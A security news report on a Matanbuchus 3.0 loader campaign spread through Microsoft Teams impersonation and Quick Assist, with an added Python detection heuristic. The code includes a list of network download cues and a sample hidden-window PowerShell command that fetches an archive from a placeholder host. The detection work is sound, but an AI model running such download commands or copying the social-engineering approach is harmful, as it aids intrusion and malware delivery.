- Morphisec researchers spotted Matanbuchus 3.0 in the wild
- The malware acts as a loader for Cobalt Strike beacons or ransomware
- Victims are approached through Microsoft Teams and asked to grant remote access
Security researchers are warning about an ongoing campaign that abuses Microsoft Teams to deploy a piece of malware called Matanbuchus 3.0.
According to the Morphisec cybersecurity team, an unidentified hacking group first carefully selects its victims, then approaches them through Microsoft Teams while posing as an external IT support team.
They try to persuade the victim that there is a problem with their device and that they need to grant remote access so it can be fixed. Because the victims are hand-picked, the approach has a higher chance of success than a mass campaign.
Expensive malware-as-a-service
Once access is granted, usually through Quick Assist, the attackers run a PowerShell script that deploys Matanbuchus 3.0, a malware loader that can lead to Cobalt Strike beacons or even ransomware.
“The victims are carefully targeted and persuaded to execute a script that triggers the download of an archive,” said Michael Gorelik, CTO of Morphisec. “This archive contains a renamed Notepad++ updater (GUP), a slightly modified configuration XML file, and a malicious side-loaded DLL that represents the Matanbuchus loader.”
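The chain described above (Quick Assist session, PowerShell download, a renamed Notepad++ updater side-loading a DLL) leaves footprints in process-creation telemetry. The following is an added example, not Morphisec's or The Hacker News's code: a small heuristic that runs over constructed process-creation events shaped like Sysmon Event ID 1 fields (Image, ParentImage, OriginalFileName, CommandLine). The Quick Assist process name, the Notepad++ updater install directory, and the sample events are assumptions for illustration, not details taken from the article.

```python
"""Heuristic detection for the Teams / Quick Assist -> PowerShell -> renamed GUP chain.

Added example (not the article's or Morphisec's code). Event layout mirrors
Sysmon Event ID 1 fields; process and path names below are assumptions.
"""
from dataclasses import dataclass
from pathlib import PureWindowsPath

# Assumption: Quick Assist's executable name as seen in ParentImage.
REMOTE_ASSIST_IMAGES = {"quickassist.exe"}
# Assumption: default Notepad++ updater directory on a 64-bit install.
NPP_UPDATER_DIR = r"C:\Program Files\Notepad++\updater"
SHELL_IMAGES = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# Generic download cues for a PowerShell/cmd command line (heuristic, not a signature).
DOWNLOAD_CUES = ("invoke-webrequest", "iwr ", "curl ", "downloadstring",
                 "downloadfile", "start-bitstransfer")


@dataclass
class ProcEvent:
    image: str               # full path of the new process   (Sysmon: Image)
    parent_image: str        # full path of the parent         (Sysmon: ParentImage)
    original_file_name: str  # PE version-info file name       (Sysmon: OriginalFileName)
    command_line: str        # command line                    (Sysmon: CommandLine)


def _basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def flag_event(ev: ProcEvent) -> list[str]:
    """Return one reason string per rule the event trips; empty list if clean."""
    reasons: list[str] = []
    image = _basename(ev.image)
    parent = _basename(ev.parent_image)

    # Rule 1: an interactive shell started under a remote-assistance session.
    if image in SHELL_IMAGES and parent in REMOTE_ASSIST_IMAGES:
        reasons.append("shell spawned under remote-assistance session")

    # Rule 2: that shell (or any shell) pulling content from the network.
    if image in SHELL_IMAGES and any(c in ev.command_line.lower() for c in DOWNLOAD_CUES):
        reasons.append("shell command line fetches remote content")

    # Rule 3: the Notepad++ updater. Renaming the file on disk does not change the
    # PE version-info OriginalFileName, so a gup.exe binary running under another
    # name, or outside its install directory, is the renamed-updater pattern.
    if ev.original_file_name.lower() == "gup.exe":
        parent_dir = str(PureWindowsPath(ev.image).parent).lower()
        if image != "gup.exe" or parent_dir != NPP_UPDATER_DIR.lower():
            reasons.append("Notepad++ updater (gup.exe) renamed or run outside its install directory")

    return reasons


def scan(events: list[ProcEvent]) -> list[tuple[int, list[str]]]:
    """Index and reasons for every flagged event, in order."""
    hits = []
    for i, ev in enumerate(events):
        reasons = flag_event(ev)
        if reasons:
            hits.append((i, reasons))
    return hits


# Constructed sample events (not real telemetry). Paths are assumptions.
SAMPLE_EVENTS = [
    # 0: legitimate updater launched by Notepad++ from its install directory
    ProcEvent(r"C:\Program Files\Notepad++\updater\GUP.exe",
              r"C:\Program Files\Notepad++\notepad++.exe", "gup.exe",
              r'"C:\Program Files\Notepad++\updater\GUP.exe" -v8.6'),
    # 1: PowerShell spawned by Quick Assist, fetching an archive
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Program Files\WindowsApps\QuickAssist\QuickAssist.exe", "PowerShell.EXE",
              r'powershell -nop -w hidden -c "iwr https://example.invalid/upd.zip -OutFile $env:TEMP\upd.zip"'),
    # 2: renamed updater running from a temp directory (side-load host)
    ProcEvent(r"C:\Users\victim\AppData\Local\Temp\upd\svchelper.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "gup.exe",
              r"C:\Users\victim\AppData\Local\Temp\upd\svchelper.exe"),
    # 3: ordinary interactive PowerShell use
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\explorer.exe", "PowerShell.EXE", "powershell Get-ChildItem"),
]

if __name__ == "__main__":
    for idx, why in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {'; '.join(why)}")
```

Rule 3 is the one worth tuning: it depends on the endpoint sensor populating OriginalFileName, and on knowing where the legitimate updater lives on your fleet. Rules 1 and 2 will also fire on genuine helpdesk sessions, so treat them as enrichment for a Teams/Quick Assist investigation rather than as a standalone alert.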
The malware was first seen in 2021, The Hacker News reports, when cybercriminals advertised it on Russian-speaking forums for $2,500. Since then it has evolved to add new features, better command-and-control communication, more stealth, CMD and PowerShell support, and more. It also apparently costs more: the service now runs $10,000 per month for the HTTPS version and $15,000 for the DNS version.
Although the researchers do not attribute the activity, they note that a group called Black Basta has used similar social-engineering tactics in the past to deploy ransomware.
Black Basta was once among the most dangerous ransomware operations around, but it has since slowly wound down. At the end of February this year, a cybercriminal leaked chat logs detailing the group's inner workings.
Via The Hacker News